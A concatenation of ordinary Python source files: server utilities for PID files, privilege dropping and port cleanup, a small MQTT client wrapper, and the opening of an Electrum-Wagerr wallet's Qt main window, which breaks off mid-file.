os.setgroups([e.gr_gid for e in grp.getgrall()
if user in e.gr_mem] + [gid])
if gid:
os.setgid(gid)
if uid:
os.setuid(uid)
class LazyWriter(object):
"""
File-like object that opens a file lazily when it is first written
to.
"""
def __init__(self, filename, mode='w'):
self.filename = filename
self.fileobj = None
self.lock = threading.Lock()
self.mode = mode
def open(self):
if self.fileobj is None:
self.lock.acquire()
try:
if self.fileobj is None:
self.fileobj = open(self.filename, self.mode)
finally:
self.lock.release()
return self.fileobj
def write(self, text):
fileobj = self.open()
fileobj.write(text)
fileobj.flush()
def writelines(self, text):
fileobj = self.open()
fileobj.writelines(text)
fileobj.flush()
def flush(self):
self.open().flush()
def live_pidfile(pidfile):
"""(pidfile:str) -> int | None
Returns an int found in the named file, if there is one,
and if there is a running process with that process id.
Return None if no such process exists.
"""
pid = read_pidfile(pidfile)
if pid:
try:
os.kill(int(pid), 0)
return pid
except OSError, e:
if e.errno == errno.EPERM:
return pid
return None
def read_pidfile(filename):
if os.path.exists(filename):
try:
f = open(filename)
content = f.read()
f.close()
return int(content.strip())
except (ValueError, IOError):
return None
else:
return None
def _remove_pid_file(written_pid, filename, verbosity):
current_pid = os.getpid()
if written_pid != current_pid:
# A forked process must be exiting, not the process that
# wrote the PID file
return
if not os.path.exists(filename):
return
f = open(filename)
content = f.read().strip()
f.close()
try:
pid_in_file = int(content)
except ValueError:
pass
else:
if pid_in_file != current_pid:
print "PID file %s contains %s, not expected PID %s" % (
filename, pid_in_file, current_pid)
return
if verbosity > 0:
print "Removing PID file %s" % filename
try:
os.unlink(filename)
return
except OSError, e:
# Record, but don't give traceback
print "Cannot remove PID file: %s" % e
# well, at least lets not leave the invalid PID around...
try:
f = open(filename, 'w')
f.write('')
f.close()
except OSError, e:
print 'Stale PID left in file: %s (%e)' % (filename, e)
else:
print 'Stale PID removed'
def ensure_port_cleanup(bound_addresses, maxtries=30, sleeptime=2):
"""
This makes sure any open ports are closed.
Does this by connecting to them until they give connection
refused. Servers should call like::
import paste.script
ensure_port_cleanup([80, 443])
"""
atexit.register(_cleanup_ports, bound_addresses, maxtries=maxtries,
sleeptime=sleeptime)
def _cleanup_ports(bound_addresses, maxtries=30, sleeptime=2):
# Wait for the server to bind to the port.
import socket
import errno
for bound_address in bound_addresses:
for attempt in range(maxtries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(bound_address)
except socket.error, e:
if e.args[0] != errno.ECONNREFUSED:
raise
break
else:
time.sleep(sleeptime)
else:
raise SystemExit('Timeout waiting for port.')
sock.close()
def _turn_sigterm_into_systemexit():
"""
Attempts to turn a SIGTERM exception into a SystemExit exception.
"""
try:
import signal
except ImportError:
return
def handle_term(signo, frame):
raise SystemExit
signal.signal(signal.SIGTERM, handle_term)
# ---- from paste.script.command --------------------------------------
python_version = sys.version.splitlines()[0].strip()
parser = optparse.OptionParser(add_help_option=False,
# version='%s from %s (python %s)'
# % (dist, dist.location, python_version),
usage='%prog [paster_options] COMMAND [command_options]')
parser.add_option(
'-h', '--help',
action='store_true',
dest='do_help',
help="Show this help message")
parser.disable_interspersed_args()
# @@: Add an option to run this in another Python interpreter
commands = {
'serve': ServeCommand
}
def run(args=None):
if (not args and
len(sys.argv) >= 2
and os.environ.get('_') and sys.argv[0] != os.environ['_']
and os.environ['_'] == sys.argv[1]):
# probably it's an exe execution
args = ['exe', os.environ['_']] + sys.argv[2:]
if args is None:
args = sys.argv[1:]
options, args = parser.parse_args(args)
options.base_parser = parser
if options.do_help:
args = ['help'] + args
if not args:
print 'Usage: %s COMMAND' % sys.argv[0]
args = ['help']
command_name = args[0]
if command_name not in commands:
command = NotFoundCommand
else:
command = commands[command_name]
invoke(command, command_name, options, args[1:])
def invoke(command, command_name, options, args):
try:
runner = command(command_name)
exit_code = runner.run(args)
except BadCommand, e:
print e.message
exit_code = e.exit_code
sys.exit(exit_code) |
mqttserviceprovider.py | #Manages connection to MQTT server.
#Handles subscriptions/publishing to server.
import paho.mqtt.client as mqtt
import json
import threading
def sameFunction(f1, f2): #used for unsubscribing, remove all subscriptions with a certain handler. Hacky, fix later.
if hasattr(f1, '__func__'):
f1 = f1.__func__
if hasattr(f2, '__func__'):
f2 = f2.__func__
return f1 is f2
class MQTTServiceProvider:
def __init__(self, clientName, serverAddress):
self.client = mqtt.Client(clientName)
self.client.on_connect = self.on_connect
self.client.on_message = self.on_message
self.client.on_publish = self.on_publish
self.client.connect(serverAddress)
self.subscriptions = {}
self.run()
def on_connect(self, client, userdata, flags, rc):
print("MQTTServiceProvider: Connected to MQTT server. Ready to subscribe and publish!")
def on_message(self, client, userdata, msg):
payload_str = msg.payload.decode('utf-8')
payload = json.loads(payload_str)
payload["topic"] = msg.topic
print("MQTT IN: TOPIC: %s and MESSAGE w/topic re-inserted: %s" % (msg.topic, payload))
handlers = self.subscriptions[msg.topic]
for handler in handlers:
handler(payload)
def on_publish(self, client, userdata, res):
pass
#Need to connect this to topic:handler
def subscribe(self, topic, handler):
self.client.subscribe(topic)
if topic not in self.subscriptions:
self.subscriptions[topic] = [handler]
else:
current_handlers = self.subscriptions[topic]
if handler not in set(current_handlers):
current_handlers.append(handler)
def unsubscribe(self, handler):
for topic in self.subscriptions:
handlers = self.subscriptions[topic]
keep = []
for h in handlers:
if sameFunction(h, handler) and h.__self__ == handler.__self__:
print("MQTT: Removing subscription to", topic)
else:
keep.append(h)
self.subscriptions[topic] = keep
def publish(self, topic, msg):
msg_str = json.dumps(msg).encode('utf-8')
try:
self.client.publish(topic, msg_str)
except Exception as e:
print("ERROR:", e)
print("MQTT OUT: TOPIC: %s and MESSAGE: %s" % (topic, msg_str))
def run(self):
t = threading.Thread(target=self.client.loop_forever)
t.start() |
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from electrum import constants
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
import time
from datetime import datetime
from pytz import timezone
from tzlocal import get_localzone
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor,QDoubleValidator
from PyQt5.QtCore import QItemSelectionModel, QModelIndex, QRect, QSize, QSize, QStringListModel, QTimer, Qt, pyqtSignal, pyqtSlot
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,QLayout,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,QFrame,
QShortcut, QMainWindow, QCompleter, QInputDialog,QDesktopWidget,
QWidget, QMenu, QSizePolicy, QStatusBar, QListView,QAbstractItemView,QSpacerItem, QSizePolicy,QListWidget,QListWidgetItem)
from PyQt5.QtGui import QStandardItemModel, QStandardItem,QFont
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.paymentrequest import PR_PAID
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, read_QImage, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .betting_history_list import (BettingHistoryList, BettingHistoryModel)
from .quick_games.dice.dice_history_list import (DiceHistoryList, DiceHistoryModel)
from .update_checker import UpdateCheck, UpdateCheckThread
from electrum.bet import PeerlessBet
from electrum.chaingame import ChainGame
from PyQt5 import QtWidgets
from .toogle_switch import ToogleSwitch
from .sport_list import SportListView
from .quick_games.quickgame_list import QuickGameListView
from .quick_games.dice.dicegame_main_widget import DiceGameWidget
from .betting_main_widget import BettingMainWidget
import re
from electrum.event import Event
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.hbox=QHBoxLayout()
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
self.password = None
def reset_password():
self.password = None
self.gui_object.password_timer.timeout.connect(reset_password)
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.sports_data = ''
self.tabs = tabs = QTabWidget(self)
self.tabs.setStyleSheet("QTabWidget::pane {"
"background-color: #DEE2E6;"
"border:0;"
"}")
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.betting_tab = self.create_betting_tab()
self.chaingames_tab = self.create_chaingames_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
tabs.addTab(self.betting_tab, read_QIcon("tab_betting.png"), _('Betting'))
tabs.addTab(self.chaingames_tab, read_QIcon("tab_chaingame.png"), _('ChainGames'))
tabs.addTab(self.create_betting_history_tab(), read_QIcon("tab_bettinghistory.png"), _('Betting History'))
tabs.setTabEnabled(4, False)
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
self.betting_history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
self.betting_history_model.update_tx_mined_status(tx_hash, tx_mined_status)
self.dice_history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
# try:
# self.sports_data = self.network.run_from_another_thread(self.network.get_sports_list(timeout=3))
# print('Sport List: ', self.sports_data)
# except Exception as e:
# self.show_message(_("Error getting event list from network") + ":\n" + str(e))
# return
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-Wagerr Testnet" if constants.net.TESTNET else "Electrum-Wagerr"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
#self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Wagerr network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
#self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
#tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://wagerr.com"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("https://wagerr.zendesk.com/hc/en-us/categories/360002783232-Wagerr-Electrum-SPV-wallet")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('wagerr:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
